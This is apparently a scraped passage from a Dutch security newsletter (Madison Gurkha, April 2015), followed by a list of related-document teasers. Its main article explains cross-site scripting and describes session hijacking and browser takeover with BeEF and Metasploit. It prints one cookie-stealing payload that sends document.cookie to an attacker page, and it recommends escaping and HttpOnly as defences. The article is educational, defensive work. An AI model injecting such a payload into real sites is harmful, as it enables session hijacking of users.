kan worden van het security incident. Dit biedt de mogelijkheid verbeteringen door te voeren in IT-beveiligingsprocessen waardoor de kosten (in tijd en geld) van toekomstige incidenten wordt verlaagd. Hierbij kan men denken aan technische maatregelen waardoor de kans op een bepaalde categorie incidenten wordt verlaagd en een betere detectie waardoor de schade kan worden beperkt. Met het gegeven voorbeeld van de website kan het interessant zijn de security monitoring voor de databases te verbeteren. Op deze manier was het mogelijk geweest de exfiltratie van gebruikersgegevens vroegtijdig te detecteren. De komende jaren zullen we zien dat incident response naast protectie en detectie een steeds belangrijkere rol gaat spelen bij organisaties. Het is daarbij belangrijk eerst een goede basis te hebben in de vorm van protectie en detectie alvorens serieus aan response kan worden gedacht. Als alles goed op elkaar is afgestemd biedt response de kans verbeteringen door te voeren op de andere fases en vice versa, met als eindresultaat een continue verbetering van het niveau van beveiliging en een lagere impact van security incidenten. Aangenaam, mijn naam is Marloes Kwakkel, 34 jaar oud en geboren en getogen in IJsselmuiden. Inmiddels woon ik samen met mijn vriend op een akkerbouwbedrijf in de Noordoostpolder. Na mijn opleiding Bedrijfskunde en Agribusiness ben ik begonnen bij Getronics. Hier heb ik de kans gekregen om als consultant aan de slag te gaan. In deze functie heb ik veel te maken gekregen met de onderwerpen bedrijfscontinuïteit, crisismanagement en informatiebeveiliging. Omdat ik graag meer de kant van risicomanagement opwilde, heb ik de overstap gemaakt naar Univé. Daar ben ik werkzaam geweest als Risk & Compliance officer. Hoewel de verbreding mij aansprak, gaf ik toch de voorkeur aan het werken op projectbasis en ben ik ongeveer 3 jaar geleden weer teruggekeerd naar een bestaan als consultant. Recent ben ik in aanraking gekomen met ITSX en dat klikte meteen. Ik ben dan ook erg blij met de start die ik daar op 10 maart jl. heb gemaakt. Ik heb erg veel zin om als Risk Consultant voor ITSX aan de slag te gaan. Marloes Kwakkel Risk Consultant, ITSX i T S X Madison Gurkha april

12 De Hack Dit keer in de rubriek De Hack vertelt Rinke Beimin, security consultant bij Madison Gurkha, meer over het uitbuiten van cross-site-scripting kwetsbaarheden. Aanvallen met Cross-site-scripting Veel klanten zijn al bekend met het JavaScript-alert scherm dat door ons wordt gebruikt als bewijs om aan te tonen dat een cross-site-scriptingkwetsbaarheid is gevonden in een webapplicatie. Op zichzelf is dit genoeg bewijs om aan te tonen dat een applicatie kwetsbaar is, er wordt namelijk code uitgevoerd. De gevolgen zijn echter lastig in te schatten. Wat betekent cross-site-scripting eigenlijk? Hoe kan deze simpele popup leiden tot volledige systeemtoegang? En belangrijker: voor wie is het eigenlijk een risico en in welke mate? Dit artikel geeft antwoord op deze vragen. 12 Madison Gurkha april 2015

13 de hack Terminologie Met het woord scripting in de samenstelling cross-sitescripting wordt JavaScript-code bedoelt. JavaScript is een programmeertaal die in webapplicaties wordt gebruikt om dynamische inhoud te creëren, de browser te besturen en om een wisselwerking mogelijk te maken tussen een webapplicatie en een gebruiker. De vertaling van cross-site-scripting is dus: de mogelijkheid om JavaScript-code uit te voeren binnen een website, waarbij de code van buiten de originele website afkomstig is. Het gevaar wordt hiermee al impliciet duidelijk gemaakt: een aanvaller kan willekeurige code uitvoeren in de browser van een gebruiker. Cross-site-scripting wordt afgekort als XSS. Men onderkent twee types XSS: reflected en stored. Bij de reflected versie kan een gebruiker alleen worden aangevallen wanneer deze een URL opvraagt waaraan een aanvaller code heeft toegevoegd. Deze versie van XSS is buitengewoon handig voor (spear)phishing aanvallen, bijvoorbeeld door het opnemen van de URL in een . Bij stored XSS heeft de aanvaller er voor kunnen zorgen dat JavaScriptcode persistent is opgeslagen in de backend (database) van de webapplicatie. Alle gebruikers die een pagina opvragen die de code bevat, worden aangevallen. Dat de mogelijkheden van JavaScript weinig begrensd zijn, en dat aanvallers buitengewoon creatief zijn in het bedenken van code, zal blijken in de volgende paragrafen. Aanvallen We beschrijven twee soorten praktisch haalbare aanvallen: session hijacking en het verkrijgen van systeemtoegang. Beide aanvallen kunnen worden uitgevoerd met het BeEFframework (The Browser Exploitation Framework Project). Het BeEF-framework is open source software, specifiek ontwikkeld om XSS-kwetsbaarheden uit te buiten. De eerste is relatief simpel, hierbij wordt via XSS de sessiecookie van een gebruiker verstuurd naar een aanvaller, waardoor een aanvaller toegang heeft tot alle functionaliteit en gegevens van de sessie van de gebruiker (session hijacking). De tweede aanval beschrijft een volledige overname van het systeem van een gebruiker, waarbij kwetsbaarheden in de browser software (Firefox, Internet Explorer, etcetera) en browser-toepassingen (Java, Flash, etcetera) worden uitgebuit. U weet wel, die vervelende updates die iedere dag om aandacht vragen. Session hijacking Wanneer iemand inlogt op een website, hoeft gedurende de sessie maar eenmaal een gebruikersnaam en een wachtwoord te worden ingevoerd. Het feit dat een gebruiker succesvol geauthenticeerd is, wordt vervolgens opgeslagen in een cookie (het sessiecookie). In veel gevallen is dit een lange en moeilijk te raden karakterreeks. JavaScript heeft, wanneer er geen mitigatiemaatregelen zijn getroffen, toegang tot cookies. Dit is mogelijk via het Document Object Model (DOM), wat een hierarchische voorstelling is van de opbouw van een webpagina. Via één regel code kan een sessiecookie worden aangesproken door scripts van een aanvaller. Dit is te zien in afbeelding 1, waarbij via een JavaScript-alert het sessiecookie wordt getoond. Dit sessiecookie kan eenvoudig worden weggesluisd naar een systeem van een aanvaller, bijvoorbeeld door via JavaScript een webserver op te vragen van een aanvaller met de sessiecookie als parameter: <script>window.location= xss.php?var= +document.cookie;</script>. De opslag en verwerking van sessiecookies kan door een aanvaller volledig geautomatiseerd worden. Systeemovername Het BeEF-framework is een tool die zich concentreert op kwetsbaarheden in de browser en biedt veel mogelijkheden om geavanceerde aanvallen uit te voeren via XSS. Het framework bestaat uit twee onderdelen. Het eerste is een beheerscherm, waar aangevallen browsers worden getoond en waarmee meer geavanceerde aanvallen kunnen worden opgezet. Het tweede onderdeel is een via web opvraagbaar malafide JavaScript-bestand dat gebruikt wordt als XSS-payload. Wanneer deze payload via XSS wordt toegevoegd aan een pagina, en wordt opgevraagd door een gebruiker, wordt het systeem van de gebruiker toegevoegd aan de lijst van browsers in het beheerscherm (zie afbeelding 2). Vervolgens kan het systeem worden geselecteerd en kunnen er aanvallen op worden uitgevoerd. Doordat BeEF geconfigureerd kan worden om te communiceren met het Metasploit-framework, Madison Gurkha april

14 De Hack is het zelfs mogelijk om via JavaScript buffer overflows uit te buiten. Bij een succesvolle uitbuiting van browser software wordt systeemtoegang verkregen, waardoor als het ware de hele gehardende netwerkomgeving wordt omzeilt. Tijdens de aankomende Black Hat Sessions op 18 juni zal Daniël Dragi čevi ć een concrete aanval presenteren waarmee domeinbeheerdersrechten worden verkregen door te starten met een XSS-aanval. Bescherming Hoe kunnen XSS-aanvallen worden voorkomen? Verschillende maatregelen kunnen worden toegepast aan zowel de zijde van de server die de webapplicatie aanbiedt (server-side) als aan de zijde van de gebruiker die applicaties benadert (clientside). Een combinatie van maatregelen is het beste. Server-side XSS-kwetsbaarheden kunnen door de webapplicatie zelf volledig worden voorkomen door consistente encodering (ook wel: HTML-escaping) toe te passen op alle gebruikersinvoer. Immers, als door de aanvaller ingevoerde code niet door de browser als code wordt gezien, wordt het ook niet uitgevoerd. Iedere programmeertaal, en vrijwel ieder framework, biedt meedere mogelijkheden voor correcte escaping. Tevens kunnen mitigatiemaatregelen worden opgenomen in headers in responses die de webserver naar gebruikers stuurt: de cookie-flag HttpOnly zorgt ervoor dat een cookie niet via JavaScript kan worden benaderd en er bestaan meerdere headers die het bereik van JavaScript indammen (https:// Client-side Op het systeem van gebruikers zelf is het allereerst noodzakelijk om alle browser software altijd up-to -date te hebben. Gisteren uitgebrachte versies van Java en Flash kunnen vandaag alweer kwetsbaar zijn. Zorg zowel als gebruiker en als systeembeheerder voor (zeer) regelmatige updates. Tevens bevatten alle moderne browsers modules om JavaScript standaard te deactiveren, en per website waar nodig weer te activeren. Conclusie Wie wordt er (het meest) getroffen bij XSS-aanvallen? In veel gevallen treft uitbuiting door middel van XSS de gebruiker van de webapplicatie, en niet de eigenaar daarvan. Dit kan zowel in persoonlijke als in professionele situaties voorkomen. Het is niet het geval dat onderliggende systemen van de uitbater van de website direct kwetsbaar zijn bij XSS, zoals bijvoorbeeld wel het geval is bij een SQL-injectie- of commandoinjectie-kwetsbaarheid. Via tactisch gebruik van reflected XSS kunnen echter wel specifiek beheerders en ontwikkelaars van webapplicaties worden aangevallen. XSS kan in ieder geval een zeer interessante stepping stone zijn voor verdere aanvallen om snel interne netwerken te benaderen. 14 Madison Gurkha april 2015

15 workshops en Cursussen Van XSS naar domain admin Tijdens de hands-on hacking workshop Van XSS naar domain admin leggen security consultants van Madison Gurkha uit hoe een XSS-kwetsbaarheid gebruikt kan worden om domain admin-rechten te krijgen. U leert hands-on welke stappen er nodig zijn en u krijgt handige tips en trucs. De workshop wordt tijdens de Black Hat Sessions tweemaal aangeboden: een ochtendsessie van uur tot uur en een middagsessie van uur tot uur. Via het online inschrijfformulier kunt u zich aanmelden voor de workshop. Let op! Er is per workshop ruimte voor maximaal 20 deelnemers. Inschrijving vindt plaats op volgorde van aanmelding. PGP Key Signing Party Het gebruik van encryptie in het dagelijks leven komt steeds vaker voor. Maakt u gebruik van een PGP-sleutel? Dan is dit de kans om uw web-of-trust verder uit te breiden. Tijdens de PGP Key Signing Party wordt de gelegenheid geboden om de identiteit en de PGP-sleutel van andere gebruikers te controleren. Hierbij zal ook uitleg gegeven worden over hoe dit proces verloopt en hoe u vervolgens later de PGP-sleutels van de andere gebruikers kunt ondertekenen. De PGP Key Signing Party vindt plaats op 18 juni tijdens de lunchpauze van de Black Hat Sessions. U kunt zich via het online inschrijfformulier hiervoor aanmelden. Na aanmelding ontvangt u van ons meer informatie en verdere instructies. Let op! het aantal plaatsen is beperkt. Heeft u vragen over de PGP Key Signing Party? Stel ze gerust via: madison-gurkha.com. Agenda Hieronder vermelden wij een aantal interessante bijeenkomsten/beurzen die de komende tijd zullen plaatsvinden. 22 en 23 april 2015 Vakbeurs Overheid 360 Jaarbeurs Utrecht 21 en 22 mei 2015 Europese OWASP application security conferentie RAI, Amsterdam https://2015.appsec.eu 11 juni 2015 Tech en Recht Seminar Igluu, Eindhoven 18 juni 2015 Black Hat Sessions Part XIII Hotel en Congrescentrum de ReeHorst 4 en 5 november 2015 Vakbeurs Infosecurity.nl Jaarbeurs Utrecht School of excellence ITSX s School of excellence start in het najaar haar cursusseizoen met vijf opleidingen. Zie hiernaast voor het overzicht. In tegenstelling tot de in-company trainingen zijn deze dagen open voor alle professionals en bedrijven die hun kennis op het gebied van risicomanagement, informatiebeveiliging en privacy willen vergroten. Alle cursussen worden afgesloten met een examendag waarop het certificaat behaald kan worden. De cursussen worden georganiseerd bij ITSX, op de campus van The Hague Security Delta. Voor meer informatie kunt u contact opnemen met Thorgal Nicasia via of bel naar ISO 27001/2 Information Security Management Lead Implementer 21 t/m 25 sept (4 dagen cursus + 1 examendag) ISO 27001/2 Information Security Management Lead Auditor 28 sept. t/m 2 okt (4 dagen cursus + 1 examendag) ISO Security Incident Management 19 t/m 23 okt (4 dagen cursus + 1 examendag) ISO Information Risk Management 23 nov. t/m 26 nov (3 dagen cursus + 1 examendag) ISO Enterprise Risk Management 30 nov. t/m 3 dec (3 dagen cursus + 1 examendag) het colofon Redactie Rinke Beimin Daniël Dragičević Laurens Houben Remco Huisman Matthijs Koot Maayke van Remmen Ward Wouts Vormgeving & productie Hannie van den Bergh / Studio-HB Foto cover Digidaan Contactgegevens Madison Gurkha B.V. Postbus CE Eindhoven Nederland T F E Redactie Bezoekadres Vestdijk CA Eindhoven Nederland Voor een digitale versie van de Madison Gurkha Update kunt u terecht op Aan zowel de fysieke als de digitale uitgave kunnen geen rechten worden ontleend. Madison Gurkha april

16 Black Hat Sessions XIII 18 juni 2015 De Reehorst Ede Op 18 juni 2015 organiseert Madison Gurkha alweer de dertiende editie van de inmiddels befaamde Black Hat Sessions. Het thema van deze editie luidt: Hoe veilig is (IT in) Nederland? Een breed en uitermate relevant thema. Want overal waar je kijkt speelt IT een hoofdrol. organisatie Your Security is Our Business Via het inschrijfformulier op kunt u zich direct aanmelden. Voor de kortingscode en groepskortingen zie pag. 5. Eric Luiijf (keynote) TNO Hans de Vries (keynote) NCSC Teun van Dongen Alex Bik BIT Ed de Myttenaere NRG Paul van der Ploeg NRG K. Reid Wightman Digital Bond Labs Maciej Korczynski TU Delft Daniël Dragi čevi ć Madison Gurkha Alexander Polyakov ERPscan Dmitry Chastuchin ERPscan Erwin Kooi Alliander hoofdsponsoren Hoofd mediapartner sponsors Media/kennispartners NOREA DE BEROEPSORGANISATIE VAN IT-AUDITORS Platform voor IT-professionals

Grip op Secure Software Development de rol van de tester

Grip op Secure Software Development de rol van de tester Grip op Secure Software Development de rol van de tester Rob van der Veer / Arjan Janssen Testnet 14 oktober 2015 Even voorstellen.. Arjan Janssen Directeur P&O DKTP a.janssen@dktp.nl DKTP is gespecialiseerd

Nadere informatie

Testnet Presentatie Websecurity Testen "Hack Me, Test Me" 1

Testnet Presentatie Websecurity Testen Hack Me, Test Me 1 Testnet Voorjaarsevenement 05 April 2006 Hack Me, Test Me Websecurity test onmisbaar voor testanalist en testmanager Edwin van Vliet Yacht Test Expertise Center Hack me, Test me Websecurity test, onmisbaar

Nadere informatie

Zest Application Professionals Training &Workshops

Zest Application Professionals Training &Workshops Het in kaart krijgen van kwetsbaarheden in Websites & Applicaties en hoe deze eenvoudig te voorkomen zijn, wordt in Applicatie Assessments aangetoond en in een praktische Workshop behandelt. U doet hands-on

Nadere informatie

Beveiliging en bescherming privacy

Beveiliging en bescherming privacy Beveiliging en bescherming privacy Beveiliging en bescherming privacy Duobus B.V. Nieuwe Boteringestraat 82a 9712PR Groningen E info@duobus.nl I www.duobus.nl September 2014 2 Voorwoord Als organisatie

Nadere informatie

Factsheet DATALEKKEN COMPLIANT Managed Services

Factsheet DATALEKKEN COMPLIANT Managed Services Factsheet DATALEKKEN COMPLIANT Managed Services DATALEKKEN COMPLIANT Managed Services We ontwerpen en implementeren security maatregelen om datalekken te detecteren en het risico daarop te minimaliseren.

Nadere informatie

Help! Mijn website is kwetsbaar voor SQL-injectie

Help! Mijn website is kwetsbaar voor SQL-injectie Help! Mijn website is kwetsbaar voor SQL-injectie Controleer uw website en tref maatregelen Factsheet FS-2014-05 versie 1.0 9 oktober 2014 SQL-injectie is een populaire en veel toegepaste aanval op websites

Nadere informatie

BEVEILIGINGSARCHITECTUUR

BEVEILIGINGSARCHITECTUUR BEVEILIGINGSARCHITECTUUR Risico s onder controle Versie 1.0 Door: drs. Ir. Maikel J. Mardjan MBM - Architect 2011 cc Organisatieontwerp.nl AGENDA Is een beveiligingsarchitectuur wel nodig? Oorzaken beveiligingsincidenten

Nadere informatie

Factsheet Penetratietest Infrastructuur

Factsheet Penetratietest Infrastructuur Factsheet Penetratietest Infrastructuur Since the proof of the pudding is in the eating DUIJNBORGH - FORTIVISION Stadionstraat 1a 4815NC Breda +31 (0) 88 16 1780 www.db-fortivision.nl info@db-fortivision.nl

Nadere informatie

SURFconext Cookbook. Het koppelen van Alfresco aan SURFconext. Versie: 1.0. Datum: 8 december 2013. 030-2 305 305 admin@surfnet.nl www.surfnet.

SURFconext Cookbook. Het koppelen van Alfresco aan SURFconext. Versie: 1.0. Datum: 8 december 2013. 030-2 305 305 admin@surfnet.nl www.surfnet. SURFconext Cookbook Het koppelen van Alfresco aan SURFconext Auteur(s): Frank Niesten Versie: 1.0 Datum: 8 december 2013 Radboudkwartier 273 3511 CK Utrecht Postbus 19035 3501 DA Utrecht 030-2 305 305

Nadere informatie

We maken inzichtelijk op welke punten u de beveiliging van uw applicaties en infrastructuur kunt verbeteren.

We maken inzichtelijk op welke punten u de beveiliging van uw applicaties en infrastructuur kunt verbeteren. Managed Services Managed Services We maken inzichtelijk op welke punten u de beveiliging van uw applicaties en infrastructuur kunt verbeteren. Met onze Security Management diensten bewaken we de continuïteit

Nadere informatie

Taskforce Informatiebeveiligingsbeleid.

Taskforce Informatiebeveiligingsbeleid. Taskforce Informatiebeveiligingsbeleid. Cursus 1 2015-2016 plus overnachting Aanleiding: Om het deskundigheidsniveau van instellingen te vergroten, zal een masterclass Privacy georganiseerd worden. Deze

Nadere informatie

Factsheet SECURITY SCANNING Managed Services

Factsheet SECURITY SCANNING Managed Services Factsheet SECURITY SCANNING Managed Services SECURITY SCANNING Managed Services We maken inzichtelijk op welke punten u de beveiliging van uw applicaties en infrastructuur kunt verbeteren. Met onze Security

Nadere informatie

DigiNotar certificaten

DigiNotar certificaten DigiNotar certificaten Onlangs is duidelijk geworden dat er digitaal is ingebroken bij het bedrijf Diginotar. Daarmee worden alle DigiNotar certificaten niet meer als veilig geaccepteerd. Certificaten

Nadere informatie

Factsheet SECURITY SCANNING Managed Services

Factsheet SECURITY SCANNING Managed Services Factsheet SECURITY SCANNING Managed Services SECURITY SCANNING Managed Services We maken inzichtelijk op welke punten u de beveiliging van uw applicaties en infrastructuur kunt verbeteren. Met onze Security

Nadere informatie

Introductie Veiligheidseisen Exploiten Conclusie. Browser security. Wouter van Dongen. RP1 Project OS3 System and Network Engineering

Introductie Veiligheidseisen Exploiten Conclusie. Browser security. Wouter van Dongen. RP1 Project OS3 System and Network Engineering Browser security Wouter van Dongen RP1 Project OS3 System and Network Engineering Februari 4, 2009 1 Introductie Onderzoeksvraag Situatie van de meest populaire browsers Client-side browser assets vs.

Nadere informatie

Gratis bescherming tegen zero-days exploits

Gratis bescherming tegen zero-days exploits Gratis tegen zero-days exploits We zien de laatste jaren een duidelijke toename van geavanceerde dreigingen op onze computersystemen. In plaats van het sturen van alleen e-mails met geïnfecteerde bijlagen

Nadere informatie

Training en workshops

Training en workshops Mirabeau Academy HACKING OWASP TOP 10 Training en workshops MIRABEAU ACADEMY AHEAD IN A DIGITAL WORLD Digitaal denken zit in onze code. We weten exact wat er online speelt. Sinds 2001 ontwikkelen we platformen

Nadere informatie

Grip op Secure Software Development

Grip op Secure Software Development Titel Grip op Secure Software Development De opdrachtgever aan het stuur Marcel Koers 27 mei 2014 Grip op Secure Software Development 1 CIP: Netwerkorganisatie Kennispartners Participanten Vaste kern DG

Nadere informatie

HOE OMGAAN MET DE MELDPLICHT DATALEKKEN?

HOE OMGAAN MET DE MELDPLICHT DATALEKKEN? HOE OMGAAN MET DE MELDPLICHT DATALEKKEN? EEN HANDIGE CHECKLIST In deze whitepaper bieden we u handvatten die u kunnen helpen bij de implementatie van de meldplicht datalekken binnen uw organisatie. We

Nadere informatie

Factsheet Penetratietest Webapplicaties

Factsheet Penetratietest Webapplicaties Factsheet Penetratietest Webapplicaties Since the proof of the pudding is in the eating DUIJNBORGH - FORTIVISION Stadionstraat 1a 4815NC Breda +31 (0) 88 16 1780 www.db-fortivision.nl info@db-fortivision.nl

Nadere informatie

ISSX, Experts in IT Security. Wat is een penetratietest?

ISSX, Experts in IT Security. Wat is een penetratietest? De Stuwdam 14/B, 3815 KM Amersfoort Tel: +31 33 4779529, Email: info@issx.nl Aanval- en penetratietest U heeft beveiligingstechnieken geïnstalleerd zoals Firewalls, Intrusion detection/protection, en encryptie

Nadere informatie

DIGID-AUDIT BIJ ZORGPORTAAL RIJNMOND

DIGID-AUDIT BIJ ZORGPORTAAL RIJNMOND DIGID-AUDIT BIJ ZORGPORTAAL RIJNMOND SAFEHARBOUR Audit en Security ISO 27001/ NEN7510 implementatie Projectadvies Risicoanalyses Zorg en overheden @djakoot @safeharbour_nl WAAROM DIGID-AUDIT? DAAROM DIGID-AUDIT

Nadere informatie

Centrum Informatiebeveiliging en Privacybescherming Grip op Secure Software Development

Centrum Informatiebeveiliging en Privacybescherming Grip op Secure Software Development Centrum Informatiebeveiliging en Privacybescherming Grip op Secure Software Development Veilige software door marktbrede samenwerking Ad Reuijl Sogeti 23 juni 2015 CIP: Centrum voor Informatiebeveiliging

Nadere informatie

INFORMATIEBEVEILIGING VOOR WEBWINKELS

INFORMATIEBEVEILIGING VOOR WEBWINKELS INFORMATIEBEVEILIGING VOOR WEBWINKELS HANDIGE CHECKLISTS In deze whitepaper bieden we u tips en checklists die kunnen bijdragen aan een optimale beveiliging van zowel uw eigen data als die van uw klanten.

Nadere informatie

Web Application Security Hacking Your Way In! Peter Schuler & Julien Rentrop

Web Application Security Hacking Your Way In! Peter Schuler & Julien Rentrop Web Application Security Hacking Your Way In! Peter Schuler & Julien Rentrop 1 Agenda Injection Cross Site Scripting Session Hijacking Cross Site Request Forgery #1 OWASP #2 top 10 #3 #5 Bezoek www.owasp.org

Nadere informatie

Hoe gaat u dit gemeentelijke varkentje wassen? Aansluiten bij de IBD Anita van Nieuwenborg

Hoe gaat u dit gemeentelijke varkentje wassen? Aansluiten bij de IBD Anita van Nieuwenborg Hoe gaat u dit gemeentelijke varkentje wassen? Aansluiten bij de IBD Anita van Nieuwenborg Programma 1. De IBD 2. stappenplan Aansluiten bij de IBD 3. VCIB-gesprek (plenair) 2 1.1 De IBD Gezamenlijk initiatief

Nadere informatie

Het Sebyde aanbod. Secure By Design

Het Sebyde aanbod. Secure By Design Het Sebyde aanbod Secure By Design Ons aanbod Security Scan Secure Development Security Awareness Security Assessment 1. Security Scan > Scan van uw web applicatie(s) op kwetsbaarheden. Hiervoor gebruiken

Nadere informatie

Uw bedrijf beschermd tegen cybercriminaliteit

Uw bedrijf beschermd tegen cybercriminaliteit Uw bedrijf beschermd tegen cybercriminaliteit MKB is gemakkelijke prooi voor cybercriminelen Welke ondernemer realiseert zich niet af en toe hoe vervelend het zou zijn als er bij zijn bedrijf wordt ingebroken?

Nadere informatie

Factsheet Penetratietest Informatievoorziening

Factsheet Penetratietest Informatievoorziening Factsheet Penetratietest Informatievoorziening Since the proof of the pudding is in the eating DUIJNBORGH - FORTIVISION Stadionstraat 1a 4815NC Breda +31 (0) 88 16 1780 www.db-fortivision.nl info@db-fortivision.nl

Nadere informatie

Aan de Voorzitter van de Tweede Kamer der Staten- Generaal Postbus 20018 2500 EA Den Haag

Aan de Voorzitter van de Tweede Kamer der Staten- Generaal Postbus 20018 2500 EA Den Haag > Retouradres Aan de Voorzitter van de Tweede Kamer der Staten- Generaal Postbus 20018 2500 EA Den Haag Directoraat Generaal Bestuur en Koninkrijksrelaties Burgerschap en Informatiebeleid www.rijksoverheid.nl

Nadere informatie

Security web services

Security web services Security web services Inleiding Tegenwoordig zijn er allerlei applicaties te benaderen via het internet. Voor bedrijven zorgt dit dat zei de klanten snel kunnen benaderen en aanpassingen voor iedereen

Nadere informatie

Digitale zelfbeschikking biedt uw burgers controle, overzicht en inzicht

Digitale zelfbeschikking biedt uw burgers controle, overzicht en inzicht Digitale zelfbeschikking biedt uw burgers controle, overzicht en inzicht Alstublieft, een cadeautje van uw gemeente! Maak gebruik van het Nieuwe Internet en geef uw burgers een eigen veilige plek in de

Nadere informatie

Handleiding ZorgMail Secure e-mail - Webmail

Handleiding ZorgMail Secure e-mail - Webmail Handleiding ZorgMail Secure e-mail - Webmail 2014 ENOVATION B.V. Alle rechten voorbehouden. Niets uit deze uitgave mag worden openbaar gemaakt of verveelvoudigd, opgeslagen in een data verwerkend systeem

Nadere informatie

SURFconext Cookbook. Het koppelen van Wordpress aan SURFconext. Versie: 1.0. Datum: 7 november 2013. 030-2 305 305 admin@surfnet.nl www.surfnet.

SURFconext Cookbook. Het koppelen van Wordpress aan SURFconext. Versie: 1.0. Datum: 7 november 2013. 030-2 305 305 admin@surfnet.nl www.surfnet. SURFconext Cookbook Het koppelen van Wordpress aan SURFconext Auteur(s): Frank Niesten Versie: 1.0 Datum: 7 november 2013 Radboudkwartier 273 3511 CK Utrecht Postbus 19035 3501 DA Utrecht 030-2 305 305

Nadere informatie

Parasoft toepassingen

Parasoft toepassingen Testen op basis van OSB en Digikoppeling Voor de bestaande Overheid Service Bus en de nieuwe standaard Digikoppeling zijn verschillende test- omgevingen opgezet. Hiermee kan het asynchrone berichtenverkeer

Nadere informatie

IT Security in de industrie

IT Security in de industrie IT Security in de industrie Praktische ervaringen met cyber security in de Energiesector en Procesindustrie Henk Spelt Henk.Spelt@kema.com Experience you can trust. Onderwerpen Waarom is (cyber) security

Nadere informatie

Sebyde AppScan Reseller. 7 Januari 2014

Sebyde AppScan Reseller. 7 Januari 2014 Sebyde AppScan Reseller 7 Januari 2014 Even voorstellen Sebyde BV is Certified IBM Business Partner voor security systems, gespecialiseerd in applicatie security en security awareness. We leveren diensten

Nadere informatie

Sebyde Security in een organisatie A3 Management Workshop. 7 Januari 2014

Sebyde Security in een organisatie A3 Management Workshop. 7 Januari 2014 Sebyde Security in een organisatie A3 Management Workshop 7 Januari 2014 Even voorstellen Sebyde BV is Certified IBM Business Partner voor security systems, gespecialiseerd in applicatie security en security

Nadere informatie

Sebyde Web Applicatie Security Scan. 7 Januari 2014

Sebyde Web Applicatie Security Scan. 7 Januari 2014 Sebyde Web Applicatie Security Scan 7 Januari 2014 Even voorstellen Sebyde BV is Certified IBM Business Partner voor security systems, gespecialiseerd in applicatie security en security awareness. We leveren

Nadere informatie

Unified Enterprise Security wordt geleverd door onze strategische partner Masergy, de wereldspeler in global communications en security.

Unified Enterprise Security wordt geleverd door onze strategische partner Masergy, de wereldspeler in global communications en security. Het verlengstuk van uw IT security operations: altijd (24x7) de beste expertise en meest actuele kennis, geïntegreerd zicht op wat er gebeurt in uw datacenter en eerder en Security as a Service Het verlengstuk

Nadere informatie

Brochure ISO 27002 Advanced

Brochure ISO 27002 Advanced Brochure ISO 27002 Advanced Over Pink Elephant Bedrijfshistorie Pink Elephant is een Nederlandse IT onderneming die rond 1980 is ontstaan als bijverdienste van een drietal studenten aan de Technische Universiteit

Nadere informatie

UWV Security SSD Instructies

UWV Security SSD Instructies UWV Security SSD Instructies BESTEMD VOOR : Patrick van Grevenbroek AUTEUR(S) : Gabriele Biondo / T. Uding (vertaling) VERSIE : 1.0 DATUM : 20-03-2014 HISTORIE Datum Auteur(s) Omschrijving 20/03/2014 Gabriele

Nadere informatie

INFORMATIEVEILIGHEID. een uitdaging van ons allemaal. ICT Noord, Harro Spanninga

INFORMATIEVEILIGHEID. een uitdaging van ons allemaal. ICT Noord, Harro Spanninga INFORMATIEVEILIGHEID een uitdaging van ons allemaal ICT Noord, Harro Spanninga Agenda Toelichting op de Taskforce BID Introductie thema Informatieveiligheid Technisch perspectief Perspectief van de overheid

Nadere informatie

3-daagse praktijktraining. IT Audit Essentials

3-daagse praktijktraining. IT Audit Essentials 3-daagse praktijktraining IT Audit Essentials Programma IT-Audit Essentials Door de steeds verdergaande automatisering van de bedrijfsprocessen wordt de beveiliging en betrouwbaarheid van de IT systemen

Nadere informatie

Informatiebeveiliging voor gemeenten: een helder stappenplan

Informatiebeveiliging voor gemeenten: een helder stappenplan Informatiebeveiliging voor gemeenten: een helder stappenplan Bewustwording (Klik hier) Structureren en borgen (Klik hier) Aanscherping en maatwerk (Klik hier) Continu verbeteren (Klik hier) Solviteers

Nadere informatie

Your Security is Our Business. Consultancy. IT-beveiligingsonderzoeken. Penetratietesten. Security Awareness

Your Security is Our Business. Consultancy. IT-beveiligingsonderzoeken. Penetratietesten. Security Awareness Your Security is Our Business Consultancy IT-beveiligingsonderzoeken Penetratietesten Security Awareness Customer Focus De medewerkers van Madison Gurkha zijn heel sterk in het meedenken en het zich verplaatsen

Nadere informatie

Beveiligingsbeleid Perflectie. Architectuur & Procedures

Beveiligingsbeleid Perflectie. Architectuur & Procedures Beveiligingsbeleid Perflectie Architectuur & Procedures 30 november 2015 Versiebeheer Naam Functie Datum Versie Dimitri Tholen Software Architect 12 december 2014 0.1 Dimitri Tholen Software Architect

Nadere informatie

Gebruikershandleiding Mijn cliëntportaal www.arienszorgpalet.nl

Gebruikershandleiding Mijn cliëntportaal www.arienszorgpalet.nl Gebruikershandleiding Mijn cliëntportaal www.arienszorgpalet.nl Versie 1 mei 2016 1 Inhoudsopgave Inleiding 3 Inloggen Mijn cliëntportaal 4 Voorbeeld Mijn cliëntportaal 7 Mijn afspraken 8 Mijn dossier

Nadere informatie

uw inloggegevens de procedure bij het inloggen in Teleboekhouden 7.2 het beheer van het gebruikersaccount

uw inloggegevens de procedure bij het inloggen in Teleboekhouden 7.2 het beheer van het gebruikersaccount Met de overgang naar Visma Teleboekhouden 7.2 is de inlogprocedure gewijzigd. Er wordt gebruik gemaakt van een OpenID van OpenID-provider Fidesque. Deze wijziging heeft gevolgen voor: uw inloggegevens

Nadere informatie

OpenIMS 4.2 Portaal Server

OpenIMS 4.2 Portaal Server OpenIMS 4.2 Portaal Server Inhoudsopgave 1 WAT IS EEN ENTERPRISE INFORMATIE PORTAAL?...3 1.1 BESPARINGEN...3 1.2 GERICHT OP EEN SPECIFIEKE DOELGROEP...3 2 OPENIMS PORTAAL SERVER (PS)...4 2.1 CENTRAAL BEHEER...4

Nadere informatie

Jacques Herman 21 februari 2013

Jacques Herman 21 februari 2013 KING bijeenkomst Audit- en Pentestpartijen Toelichting op de DigiD Rapportage template en de NOREA Handreiking DigiD ICT-beveiligingsassessments Jacques Herman 21 februari 2013 Samenvatting van de regeling

Nadere informatie

Gebruikershandleiding

Gebruikershandleiding Gebruikershandleiding Webapplicaties RDW algemeen Versie: 0.2 Versiedatum: 29 november 2007 Beheerder: RDW Veendam - R&I-OP-E&T 3 B 0800a Inhoudsopgave 1. INLEIDING...4 2. EERSTE AANMELDING...5 2.1 WAT

Nadere informatie

CMS Ronde Tafel. Cloud Continuity. Ir. Jurian Hermeler Principal Consultant

CMS Ronde Tafel. Cloud Continuity. Ir. Jurian Hermeler Principal Consultant CMS Ronde Tafel Cloud Continuity Ir. Jurian Hermeler Principal Consultant Introductie Quint Wellington Redwood Onafhankelijk Management Adviesbureau Opgericht in 1992 in Nederland Ruim 20 jaar ervaring

Nadere informatie

